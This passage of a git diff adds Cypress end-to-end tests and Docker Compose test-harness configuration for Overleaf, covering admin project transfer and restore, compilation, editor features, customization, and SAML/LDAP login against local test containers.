+        cy.get(`a[href="/admin/project/${testProjectId}"]`).click()
+
+        cy.findByText('Transfer Ownership').click()
+        cy.get('button[type="submit"]').should('be.disabled')
+        cy.get('input[name="user_id"]').type(user2)
+        cy.get('button[type="submit"]').should('not.be.disabled')
+        cy.get('button[type="submit"]').click()
+        cy.findByText('Transfer project to this user?')
+        cy.get('button').contains('Confirm').click()
+
+        cy.log('check the project is displayed in the new owner projects tab')
+        cy.get('input[name="email"]').type(user2 + '{enter}')
+        cy.findByText(user2).click()
+        cy.get('[role="tab"]').contains('Projects').click()
+        cy.get(`a[href="/admin/project/${testProjectId}"]`)
+      })
+    })
+
+    describe('project page', () => {
+      beforeEach(() => {
+        login(admin)
+        cy.visit(`/admin/project/${testProjectId}`)
+      })
+
+      it('displays expected tabs', () => {
+        const tabs = ['Project Info', 'Deleted Docs', 'Audit Log']
+        cy.get('[role="tab"]').each((el, index) => {
+          cy.wrap(el).findByText(tabs[index]).click()
+        })
+        cy.get('[role="tab"]').should('have.length', tabs.length)
+      })
+    })
+
+    it('restore deleted projects', () => {
+      login(user1)
+      cy.visit('/project')
+
+      cy.log('select project to delete')
+      findProjectRow(deletedProjectName).within(() =>
+        cy.get('input[type="checkbox"]').first().check()
+      )
+
+      cy.log('delete project')
+      findProjectRow(deletedProjectName).within(() =>
+        cy.findByRole('button', { name: 'Trash' }).click()
+      )
+      cy.get('button').contains('Confirm').click()
+      cy.findByText(deletedProjectName).should('not.exist')
+
+      cy.log('navigate to trashed projects and delete the project')
+      cy.get('.project-list-sidebar-react').within(() => {
+        cy.findByText('Trashed Projects').click()
+      })
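+      // Editorial aside (hypothetical extra assertion, not in the original
+      // commit): the project is only soft-deleted at this point, so it should
+      // be listed in the Trashed Projects view before the hard delete below.
+      cy.findByText(deletedProjectName)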
findProjectRow(deletedProjectName).within(() => + cy.findByRole('button', { name: 'Delete' }).click() + ) + cy.get('button').contains('Confirm').click() + cy.findByText(deletedProjectName).should('not.exist') + + cy.log('login as an admin and navigate to the deleted project') + login(admin) + cy.visit('/admin/user') + cy.get('input[name="email"]').type(user1 + '{enter}') + cy.get('a').contains(user1).click() + cy.findByText('Deleted Projects').click() + cy.get('a').contains(deletedProjectName).click() + + cy.log('undelete the project') + cy.findByText('Undelete').click() + cy.findByText('Undelete').should('not.exist') + cy.url().should('contain', `/admin/project/${projectToDeleteId}`) + + cy.log('login as the user and verify the project is restored') + login(user1) + cy.visit('/project') + cy.get('.project-list-sidebar-react').within(() => { + cy.findByText('Trashed Projects').click() + }) + cy.findByText(`${deletedProjectName} (Restored)`) + }) + }) +}) diff --git a/server-ce/test/create-and-compile-project.spec.ts b/server-ce/test/create-and-compile-project.spec.ts new file mode 100644 index 0000000..20f8f0d --- /dev/null +++ b/server-ce/test/create-and-compile-project.spec.ts @@ -0,0 +1,124 @@ +import { ensureUserExists, login } from './helpers/login' +import { + createProject, + openProjectViaInviteNotification, +} from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { throttledRecompile } from './helpers/compile' + +describe('Project creation and compilation', function () { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({}) + ensureUserExists({ email: 'user@example.com' }) + ensureUserExists({ email: 'collaborator@example.com' }) + + it('users can create project and compile it', function () { + login('user@example.com') + createProject('test-project') + const recompile = throttledRecompile() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type('\n\\section{{}Test Section}') + recompile() + cy.get('.pdf-viewer').should('contain.text', 'Test Section') + }) + + it('create and edit markdown file', function () { + const fileName = `test-${Date.now()}.md` + const markdownContent = '# Markdown title' + login('user@example.com') + createProject('test-project') + + // FIXME: Add aria-label maybe? 
or at least data-test-id + cy.findByText('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.get('input').clear() + cy.get('input').type(fileName) + cy.findByText('Create').click() + }) + cy.findByText(fileName).click() + // wait until we've switched to the newly created empty file + cy.get('.cm-line').should('have.length', 1) + cy.get('.cm-line').type(markdownContent) + cy.findByText('main.tex').click() + cy.get('.cm-content').should('contain.text', '\\maketitle') + cy.findByText(fileName).click() + cy.get('.cm-content').should('contain.text', markdownContent) + }) + + it('can link and display linked image from other project', function () { + const sourceProjectName = `test-project-${Date.now()}` + const targetProjectName = `${sourceProjectName}-target` + login('user@example.com') + + createProject(sourceProjectName, { + type: 'Example Project', + open: false, + }).as('sourceProjectId') + createProject(targetProjectName) + + // link the image from `projectName` into this project + cy.findByText('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.findByText('From another project').click() + cy.findByLabelText('Select a Project').select(sourceProjectName) + cy.findByLabelText('Select a File').select('frog.jpg') + cy.findByText('Create').click() + }) + cy.findByTestId('file-tree').findByText('frog.jpg').click() + cy.findByText('Another project') + .should('have.attr', 'href') + .then(href => { + cy.get('@sourceProjectId').then(sourceProjectId => { + expect(href).to.equal(`/project/${sourceProjectId}`) + }) + }) + }) + + it('can refresh linked files as collaborator', function () { + const sourceProjectName = `test-project-${Date.now()}` + const targetProjectName = `${sourceProjectName}-target` + login('user@example.com') + createProject(sourceProjectName, { + type: 'Example Project', + open: false, + }).as('sourceProjectId') + createProject(targetProjectName).as('targetProjectId') + + // link the image from `projectName` into this project + cy.findByText('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.findByText('From another project').click() + cy.findByLabelText('Select a Project').select(sourceProjectName) + cy.findByLabelText('Select a File').select('frog.jpg') + cy.findByText('Create').click() + }) + + cy.findByText('Share').click() + cy.findByRole('dialog').within(() => { + cy.findByTestId('collaborator-email-input').type( + 'collaborator@example.com,' + ) + cy.findByText('Invite').click({ force: true }) + cy.findByText('Invite not yet accepted.') + }) + + cy.visit('/project') + cy.findByText('Account').click() + cy.findByText('Log Out').click() + + login('collaborator@example.com') + openProjectViaInviteNotification(targetProjectName) + cy.get('@targetProjectId').then(targetProjectId => { + cy.url().should('include', targetProjectId) + }) + + cy.findByTestId('file-tree').findByText('frog.jpg').click() + cy.findByText('Another project') + .should('have.attr', 'href') + .then(href => { + cy.get('@sourceProjectId').then(sourceProjectId => { + expect(href).to.equal(`/project/${sourceProjectId}`) + }) + }) + }) +}) diff --git a/server-ce/test/customization.spec.ts b/server-ce/test/customization.spec.ts new file mode 100644 index 0000000..03c9bc3 --- /dev/null +++ b/server-ce/test/customization.spec.ts @@ -0,0 +1,26 @@ +import { isExcludedBySharding, startWith } from './helpers/config' + +describe('Customization', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + vars: { + 
OVERLEAF_APP_NAME: 'CUSTOM APP NAME', + OVERLEAF_LEFT_FOOTER: JSON.stringify([{ text: 'CUSTOM LEFT FOOTER' }]), + OVERLEAF_RIGHT_FOOTER: JSON.stringify([{ text: 'CUSTOM RIGHT FOOTER' }]), + }, + }) + + it('should display custom name', () => { + cy.visit('/') + cy.get('nav').findByText('CUSTOM APP NAME') + }) + + it('should display custom left footer', () => { + cy.visit('/') + cy.get('footer').findByText('CUSTOM LEFT FOOTER') + }) + it('should display custom right footer', () => { + cy.visit('/') + cy.get('footer').findByText('CUSTOM RIGHT FOOTER') + }) +}) diff --git a/server-ce/test/cypress.config.js b/server-ce/test/cypress.config.js new file mode 100644 index 0000000..07ea87b --- /dev/null +++ b/server-ce/test/cypress.config.js @@ -0,0 +1,28 @@ +const { defineConfig } = require('cypress') +const { readPdf, readFileInZip } = require('./helpers/read-file') + +const specPattern = process.env.SPEC_PATTERN || './**/*.spec.{js,ts,tsx}' + +module.exports = defineConfig({ + defaultCommandTimeout: 10_000, + fixturesFolder: 'cypress/fixtures', + video: process.env.CYPRESS_VIDEO === 'true', + screenshotsFolder: 'cypress/results', + videosFolder: 'cypress/results', + videoUploadOnPasses: false, + viewportHeight: 768, + viewportWidth: 1024, + e2e: { + baseUrl: 'http://localhost', + setupNodeEvents(on, config) { + on('task', { + readPdf, + readFileInZip, + }) + }, + specPattern, + }, + retries: { + runMode: 3, + }, +}) diff --git a/server-ce/test/cypress/.gitignore b/server-ce/test/cypress/.gitignore new file mode 100644 index 0000000..5b36de2 --- /dev/null +++ b/server-ce/test/cypress/.gitignore @@ -0,0 +1,3 @@ +downloads/ +results/ +data/ diff --git a/server-ce/test/cypress/support/e2e.js b/server-ce/test/cypress/support/e2e.js new file mode 100644 index 0000000..f8f1eac --- /dev/null +++ b/server-ce/test/cypress/support/e2e.js @@ -0,0 +1,12 @@ +import '@testing-library/cypress/add-commands' + +Cypress.on('uncaught:exception', (err, runnable) => { + if (err.message.includes('ResizeObserver')) { + // spurious error from PDF preview + return false + } + if (err.message.includes('rcube_webmail')) { + // spurious error from mailtrap + return false + } +}) diff --git a/server-ce/test/docker-compose.native.yml b/server-ce/test/docker-compose.native.yml new file mode 100644 index 0000000..c229f6a --- /dev/null +++ b/server-ce/test/docker-compose.native.yml @@ -0,0 +1,25 @@ +version: '2.2' +services: + sharelatex: + ports: + - "127.0.0.1:80:80" + environment: + OVERLEAF_SITE_URL: 'http://localhost' + + host-admin: + ports: + - "127.0.0.1:8081:80" + environment: + NATIVE_CYPRESS: 'true' + ACCESS_CONTROL_ALLOW_ORIGIN: 'http://localhost' + + saml: + ports: + - 127.0.0.1:8082:80 + environment: + SAML_BASE_URL_PATH: 'http://localhost:8082/simplesaml/' + SAML_TEST_SP_LOCATION: 'http://localhost/saml/callback' + + mailtrap: + ports: + - 127.0.0.1:8083:80 diff --git a/server-ce/test/docker-compose.yml b/server-ce/test/docker-compose.yml new file mode 100644 index 0000000..43f494a --- /dev/null +++ b/server-ce/test/docker-compose.yml @@ -0,0 +1,149 @@ +version: '2.2' +services: + sharelatex: + image: ${IMAGE_TAG_CE:-sharelatex/sharelatex:latest} + stop_grace_period: 0s + depends_on: + mongo: + condition: service_healthy + redis: + condition: service_started + mailtrap: + condition: service_started + environment: + OVERLEAF_SITE_URL: 'http://sharelatex' + OVERLEAF_APP_NAME: Overleaf Community Edition + OVERLEAF_MONGO_URL: mongodb://mongo/sharelatex?directConnection=true + OVERLEAF_REDIS_HOST: redis + REDIS_HOST: 
redis + OVERLEAF_EMAIL_FROM_ADDRESS: 'welcome@example.com' + OVERLEAF_EMAIL_SMTP_HOST: 'mailtrap' + OVERLEAF_EMAIL_SMTP_PORT: '25' + OVERLEAF_EMAIL_SMTP_IGNORE_TLS: 'true' + ENABLED_LINKED_FILE_TYPES: 'project_file,project_output_file' + ENABLE_CONVERSIONS: 'true' + EMAIL_CONFIRMATION_DISABLED: 'true' + healthcheck: + test: curl --fail http://localhost:3000/status + interval: 3s + timeout: 3s + retries: 30 + + mailtrap: + image: mailtrap + environment: + MAILTRAP_PASSWORD: 'password-for-mailtrap' + + mongo: + image: mongo:6.0 + command: '--replSet overleaf' + volumes: + - ../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the replica set. + # This override is not needed when running the setup after starting up mongo. + - mongo:127.0.0.1 + healthcheck: + test: echo 'db.stats().ok' | mongosh localhost:27017/test --quiet + interval: 3s + timeout: 3s + retries: 30 + + redis: + image: redis:7.2.1 + + git-bridge: + image: quay.io/sharelatex/git-bridge:latest + environment: + GIT_BRIDGE_API_BASE_URL: "http://sharelatex:3000/api/v0/" # "http://sharelatex/api/v0/" for version 4.1.6 and earlier + GIT_BRIDGE_OAUTH2_SERVER: "http://sharelatex" + GIT_BRIDGE_POSTBACK_BASE_URL: "http://git-bridge:8000" + GIT_BRIDGE_ROOT_DIR: "/data/git-bridge" + user: root + command: ["/server-pro-start.sh"] + + e2e: + image: cypress/included:13.13.2 + stop_grace_period: 0s + entrypoint: npm + command: run cypress:run + working_dir: /e2e + volumes: + - ./:/e2e + environment: + CYPRESS_SHARD: + CYPRESS_BASE_URL: http://sharelatex + SPEC_PATTERN: '**/*.spec.{js,jsx,ts,tsx}' + depends_on: + sharelatex: + condition: service_healthy + host-admin: + condition: service_healthy + + e2e-open: + image: cypress/included:13.13.2 + stop_grace_period: 0s + entrypoint: npm + command: run cypress:open + working_dir: /e2e + volumes: + - ./:/e2e + - /tmp/.X11-unix:/tmp/.X11-unix + user: "${DOCKER_USER:-1000:1000}" + environment: + CYPRESS_SHARD: + CYPRESS_BASE_URL: http://sharelatex + SPEC_PATTERN: '**/*.spec.{js,jsx,ts,tsx}' + DISPLAY: ${DISPLAY:-:0} + depends_on: + sharelatex: + condition: service_healthy + host-admin: + condition: service_healthy + + host-admin: + build: . + entrypoint: ["node", "--watch", "host-admin.js"] + # See comment in Makefile regarding matching file paths + working_dir: $PWD + volumes: + - $PWD:$PWD + - /var/run/docker.sock:/var/run/docker.sock + stop_grace_period: 0s + environment: + PWD: + CYPRESS_SHARD: + COMPOSE_PROJECT_NAME: + TEX_LIVE_DOCKER_IMAGE: + ALL_TEX_LIVE_DOCKER_IMAGES: + IMAGE_TAG_CE: ${IMAGE_TAG_CE:-sharelatex/sharelatex:latest} + IMAGE_TAG_PRO: ${IMAGE_TAG_PRO:-quay.io/sharelatex/sharelatex-pro:latest} + depends_on: + mongo: + condition: service_healthy + healthcheck: + test: curl --fail http://localhost/status + interval: 3s + timeout: 3s + retries: 30 + + saml: + restart: always + image: gcr.io/overleaf-ops/saml-test + environment: + SAML_TEST_SP_ENTITY_ID: 'sharelatex-test-saml' + SAML_BASE_URL_PATH: 'http://saml/simplesaml/' + SAML_TEST_SP_LOCATION: 'http://sharelatex/saml/callback' + + ldap: + restart: always + image: rroemhild/test-openldap:1.1 + # Workaround large memory allocation (using the max-open-files-limit as socket buffer scale). 
+ # REF: https://github.com/moby/moby/issues/8231#issuecomment-63877553 + # REF: https://github.com/moby/moby/issues/8231#issuecomment-63871343 + command: + - 'bash' + - '-c' + - 'ulimit -n 1024 && exec bash /run.sh' diff --git a/server-ce/test/editor.spec.ts b/server-ce/test/editor.spec.ts new file mode 100644 index 0000000..648c55a --- /dev/null +++ b/server-ce/test/editor.spec.ts @@ -0,0 +1,382 @@ +import { + createNewFile, + createProject, + enableLinkSharing, + openFile, + openProjectById, + openProjectViaLinkSharingAsUser, + toggleTrackChanges, +} from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { v4 as uuid } from 'uuid' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' +import { prepareWaitForNextCompileSlot } from './helpers/compile' + +describe('editor', () => { + if (isExcludedBySharding('PRO_DEFAULT_1')) return + startWith({ pro: true }) + ensureUserExists({ email: 'user@example.com' }) + ensureUserExists({ email: 'collaborator@example.com' }) + + let projectName: string + let projectId: string + let recompile: () => void + let waitForCompileRateLimitCoolOff: (fn: () => void) => void + beforeWithReRunOnTestRetry(function () { + projectName = `project-${uuid()}` + login('user@example.com') + createProject(projectName, { type: 'Example Project', open: false }).then( + id => (projectId = id) + ) + ;({ recompile, waitForCompileRateLimitCoolOff } = + prepareWaitForNextCompileSlot()) + }) + + beforeEach(() => { + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + }) + + describe('spelling', function () { + function changeSpellCheckLanguageTo(lng: string) { + cy.log(`change project language to '${lng}'`) + cy.get('button').contains('Menu').click() + cy.get('select[id=settings-menu-spellCheckLanguage]').select(lng) + cy.get('[id="left-menu"]').type('{esc}') // close left menu + } + + afterEach(function () { + changeSpellCheckLanguageTo('Off') + }) + + it('word dictionary and spelling', () => { + changeSpellCheckLanguageTo('English (American)') + createNewFile() + const word = createRandomLetterString() + + cy.log('edit project file') + cy.get('.cm-line').type(word) + + cy.get('.ol-cm-spelling-error').should('exist') + + changeSpellCheckLanguageTo('Spanish') + + cy.log('add word to dictionary') + cy.get('.ol-cm-spelling-error').contains(word).rightclick() + cy.findByText('Add to Dictionary').click() + cy.get('.ol-cm-spelling-error').should('not.exist') + + cy.log('remove word from dictionary') + cy.get('button').contains('Menu').click() + cy.get('button').contains('Edit').click() + cy.get('[id="dictionary-modal"]').within(() => { + cy.findByText(word) + .parent() + .within(() => cy.get('button').click()) + + // the modal has 2 close buttons, this ensures the one with the visible label is + // clicked, otherwise it would need `force: true` + cy.get('.btn').contains('Close').click() + }) + + cy.log('close left panel') + cy.get('[id="left-menu"]').type('{esc}') + + cy.log('rewrite word to force spelling error') + cy.get('.cm-line').type('{selectAll}{del}' + word + '{enter}') + + cy.get('.ol-cm-spelling-error').should('contain.text', word) + }) + }) + + describe('collaboration', () => { + beforeWithReRunOnTestRetry(function () { + enableLinkSharing().then(({ linkSharingReadAndWrite }) => { + const email = 'collaborator@example.com' + login(email) + openProjectViaLinkSharingAsUser( + 
linkSharingReadAndWrite, + projectName, + email + ) + }) + + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + }) + + it('track-changes', () => { + cy.log('disable track-changes before populating doc') + toggleTrackChanges(false) + + const fileName = createNewFile() + const oldContent = 'oldContent' + cy.get('.cm-line').type(`${oldContent}\n\nstatic`) + + cy.log('recompile to force flush') + recompile() + + cy.log('enable track-changes for everyone') + toggleTrackChanges(true) + + login('collaborator@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + openFile(fileName, 'static') + + cy.log('make changes in main file') + // cy.type() "clicks" in the center of the selected element before typing. This "click" discards the text as selected by the dblclick. + // Go down to the lower level event based typing, the frontend tests in web use similar events. + cy.get('.cm-editor').as('editor') + cy.get('@editor').findByText(oldContent).dblclick() + cy.get('@editor').trigger('keydown', { key: 'Delete' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + + cy.log('recompile to force flush') + recompile() + + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + openFile(fileName, 'static') + + cy.log('reject changes') + cy.contains('.toolbar-item', 'Review').click() + cy.get('.cm-content').should('not.contain.text', oldContent) + cy.findByText('Reject change').click({ force: true }) + cy.contains('.toolbar-item', 'Review').click() + + cy.log('recompile to force flush') + recompile() + + cy.log('verify the changes are applied') + cy.get('.cm-content').should('contain.text', oldContent) + + cy.log('disable track-changes for everyone again') + toggleTrackChanges(false) + }) + + it('track-changes rich text', () => { + cy.log('disable track-changes before populating doc') + toggleTrackChanges(false) + + const fileName = createNewFile() + const oldContent = 'oldContent' + cy.get('.cm-line').type(`\\section{{}${oldContent}}\n\nstatic`) + + cy.log('recompile to force flush') + recompile() + + cy.log('enable track-changes for everyone') + toggleTrackChanges(true) + + login('collaborator@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + cy.log('enable visual editor and make changes in main file') + cy.findByText('Visual Editor').click() + + openFile(fileName, 'static') + + // cy.type() "clicks" in the center of the selected element before typing. This "click" discards the text as selected by the dblclick. + // Go down to the lower level event based typing, the frontend tests in web use similar events. 
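+      // Editorial sketch (hypothetical helper, not part of the original
+      // commit): the keydown sequence below could be factored out as
+      //
+      //   const sendKeys = (alias: string, keys: string[]) =>
+      //     keys.forEach(key => cy.get(alias).trigger('keydown', { key }))
+      //   sendKeys('@editor', ['Delete', 'Enter', 'Enter'])
+      //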
+ cy.get('.cm-editor').as('editor') + cy.get('@editor').findByText(oldContent).dblclick() + cy.get('@editor').trigger('keydown', { key: 'Delete' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + cy.get('@editor').trigger('keydown', { key: 'Enter' }) + + cy.log('recompile to force flush') + recompile() + + login('user@example.com') + waitForCompileRateLimitCoolOff(() => { + openProjectById(projectId) + }) + openFile(fileName, 'static') + + cy.log('reject changes') + cy.contains('.toolbar-item', 'Review').click() + cy.get('.cm-content').should('not.contain.text', oldContent) + cy.findAllByText('Reject change').first().click({ force: true }) + cy.contains('.toolbar-item', 'Review').click() + + cy.log('recompile to force flush') + recompile() + + cy.log('verify the changes are applied in the visual editor') + cy.findByText('Visual Editor').click() + cy.get('.cm-content').should('contain.text', oldContent) + + cy.log('disable track-changes for everyone again') + toggleTrackChanges(false) + }) + }) + + describe('editor', () => { + it('renders jpg', () => { + cy.findByTestId('file-tree').findByText('frog.jpg').click() + cy.get('[alt="frog.jpg"]') + .should('be.visible') + .and('have.prop', 'naturalWidth') + .should('be.greaterThan', 0) + }) + + it('symbol palette', () => { + createNewFile() + + cy.get('button[aria-label="Toggle Symbol Palette"]').click({ + force: true, + }) + cy.get('button').contains('𝜉').click() + cy.get('.cm-content').should('contain.text', '\\xi') + + cy.log('recompile to force flush and avoid "unsaved changes" prompt') + recompile() + }) + }) + + describe('add new file to project', () => { + beforeEach(() => { + cy.get('button').contains('New file').click({ force: true }) + }) + + it('can upload file', () => { + const name = `${uuid()}.txt` + const content = `Test File Content ${name}` + cy.get('button').contains('Upload').click({ force: true }) + cy.get('input[type=file]') + .first() + .selectFile( + { + contents: Cypress.Buffer.from(content), + fileName: name, + lastModified: Date.now(), + }, + { force: true } + ) + // force: The file-tree pane is too narrow to display the full name. 
+ cy.findByTestId('file-tree').findByText(name).click({ force: true }) + cy.findByText(content) + }) + + it('should not display import from URL', () => { + cy.findByText('From external URL').should('not.exist') + }) + }) + + describe('left menu', () => { + beforeEach(() => { + cy.get('button').contains('Menu').click() + }) + + it('can download project sources', () => { + cy.get('a').contains('Source').click() + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/${projectName}.zip`, + fileToRead: 'main.tex', + }).should('contain', 'Your introduction goes here') + }) + + it('can download project PDF', () => { + cy.log('ensure project is compiled') + cy.get('.pdf-viewer').should('contain.text', 'Your Paper') + + cy.get('.nav-downloads').within(() => { + cy.findByText('PDF').click() + const pdfName = projectName.replaceAll('-', '_') + cy.task('readPdf', `cypress/downloads/${pdfName}.pdf`).should( + 'contain', + 'Your introduction goes here' + ) + }) + }) + + it('word count', () => { + cy.log('ensure project is compiled') + cy.get('.pdf-viewer').should('contain.text', 'Your Paper') + + cy.findByText('Word Count').click() + + cy.get('#word-count-modal').within(() => { + cy.findByText('Total Words:') + cy.findByText('607') + cy.findByText('Headers:') + cy.findByText('14') + cy.findByText('Math Inline:') + cy.findByText('6') + cy.findByText('Math Display:') + cy.findByText('1') + }) + }) + }) + + describe('layout selector', () => { + it('show editor only and switch between editor and pdf', () => { + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Layout').click() + cy.findByText('Editor only').click() + + cy.get('.pdf-viewer').should('not.be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Switch to PDF').click() + + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('not.be.visible') + + cy.findByText('Switch to editor').click() + + cy.get('.pdf-viewer').should('not.be.visible') + cy.get('.cm-editor').should('be.visible') + }) + + it('show PDF only and go back to Editor & PDF', () => { + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Layout').click() + cy.findByText('PDF only').click() + + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('not.be.visible') + + cy.findByText('Layout').click() + cy.findByText('Editor & PDF').click() + + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + }) + + it('PDF in a separate tab (tests editor only)', () => { + cy.get('.pdf-viewer').should('be.visible') + cy.get('.cm-editor').should('be.visible') + + cy.findByText('Layout').click() + cy.findByText('PDF in separate tab').click() + + cy.get('.pdf-viewer').should('not.exist') + cy.get('.cm-editor').should('be.visible') + }) + }) +}) + +function createRandomLetterString() { + const chars = 'abcdefghijklmnopqrstuvwxyz' + let result = '' + for (let i = 0; i < 12; i++) { + result += chars.charAt(Math.floor(Math.random() * chars.length)) + } + return result +} diff --git a/server-ce/test/external-auth.spec.ts b/server-ce/test/external-auth.spec.ts new file mode 100644 index 0000000..f26947e --- /dev/null +++ b/server-ce/test/external-auth.spec.ts @@ -0,0 +1,73 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { createProject } from './helpers/project' + +describe('SAML', () => { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + const samlURL = 
Cypress.env('SAML_URL') || 'http://saml' + + startWith({ + pro: true, + vars: { + EXTERNAL_AUTH: 'saml', + OVERLEAF_SAML_ENTRYPOINT: `${samlURL}/simplesaml/saml2/idp/SSOService.php`, + OVERLEAF_SAML_CALLBACK_URL: `${Cypress.config().baseUrl}/saml/callback`, + OVERLEAF_SAML_ISSUER: 'sharelatex-test-saml', + OVERLEAF_SAML_IDENTITY_SERVICE_NAME: 'SAML Test Server', + OVERLEAF_SAML_EMAIL_FIELD: 'email', + OVERLEAF_SAML_FIRST_NAME_FIELD: 'givenName', + OVERLEAF_SAML_LAST_NAME_FIELD: 'sn', + OVERLEAF_SAML_UPDATE_USER_DETAILS_ON_LOGIN: 'true', + OVERLEAF_SAML_CERT: + 'MIIDXTCCAkWgAwIBAgIJAOvOeQ4xFTzsMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNVBAYTAkdCMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTYxMTE1MTQxMjU5WhcNMjYxMTE1MTQxMjU5WjBFMQswCQYDVQQGEwJHQjETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCT6MBe5G9VoLU8MfztOEbUhnwLp17ak8eFUqxqeXkkqtWB0b/cmIBU3xoQoO3dIF8PBzfqehqfYVhrNt/TFgcmDfmJnPJRL1RJWMW3VmiP5odJ3LwlkKbZpkeT3wZ8HEJIR1+zbpxiBNkbd2GbdR1iumcsHzMYX1A2CBj+ZMV5VijC+K4P0e9c05VsDEUtLmfeAasJAiumQoVVgAe/BpiXjICGGewa6EPFI7mKkifIRKOGxdRESwZZjxP30bI31oDN0cgKqIgSJtJ9nfCn9jgBMBkQHu42WMuaWD4jrGd7+vYdX+oIfArs9aKgAH5kUGhGdew2R9SpBefrhbNxG8QIDAQABo1AwTjAdBgNVHQ4EFgQU+aSojSyyLChP/IpZcafvSdhj7KkwHwYDVR0jBBgwFoAU+aSojSyyLChP/IpZcafvSdhj7KkwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEABl3+OOVLBWMKs6PjA8lPuloWDNzSr3v76oUcHqAb+cfbucjXrOVsS9RJ0X9yxvCQyfM9FfY43DbspnN3izYhdvbJD8kKLNf0LA5st+ZxLfy0ACyL2iyAwICaqndqxAjQYplFAHmpUiu1DiHckyBPekokDJd+ze95urHMOsaGS5RWPoKJVE0bkaAeZCmEu0NNpXRSBiuxXSTeSAJfv6kyE/rkdhzUKyUl/cGQFrsVYfAFQVA+W6CKOh74ErSEzSHQQYndl7nD33snD/YqdU1ROxV6aJzLKCg+sdj+wRXSP2u/UHnM4jW9TGJfhO42jzL6WVuEvr9q4l7zWzUQKKKhtQ==', + }, + }) + + it('login', () => { + cy.visit('/') + cy.findByText('Log in with SAML Test Server').click() + + cy.origin(samlURL, () => { + cy.get('input[name="username"]').type('sally') + cy.get('input[name="password"]').type('sally123') + cy.get('button[type="submit"]').click() + }) + + cy.log('wait for login to finish') + cy.url().should('contain', '/project') + + createProject('via SAML') + }) +}) + +describe('LDAP', () => { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + startWith({ + pro: true, + vars: { + EXTERNAL_AUTH: 'ldap', + OVERLEAF_LDAP_URL: 'ldap://ldap:389', + OVERLEAF_LDAP_SEARCH_BASE: 'ou=people,dc=planetexpress,dc=com', + OVERLEAF_LDAP_SEARCH_FILTER: '(uid={{username}})', + OVERLEAF_LDAP_BIND_DN: 'cn=admin,dc=planetexpress,dc=com', + OVERLEAF_LDAP_BIND_CREDENTIALS: 'GoodNewsEveryone', + OVERLEAF_LDAP_EMAIL_ATT: 'mail', + OVERLEAF_LDAP_NAME_ATT: 'cn', + OVERLEAF_LDAP_LAST_NAME_ATT: 'sn', + OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN: 'true', + }, + }) + + it('login', () => { + cy.visit('/') + cy.findByText('Log in LDAP') + + cy.get('input[name="login"]').type('fry') + cy.get('input[name="password"]').type('fry') + cy.get('button[type="submit"]').click() + + cy.log('wait for login to finish') + cy.url().should('contain', '/project') + + createProject('via LDAP') + }) +}) diff --git a/server-ce/test/git-bridge.spec.ts b/server-ce/test/git-bridge.spec.ts new file mode 100644 index 0000000..071091b --- /dev/null +++ b/server-ce/test/git-bridge.spec.ts @@ -0,0 +1,396 @@ +import { v4 as uuid } from 'uuid' +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { + createProject, + enableLinkSharing, + openProjectByName, + openProjectViaLinkSharingAsUser, + shareProjectByEmailAndAcceptInviteViaDash, +} 
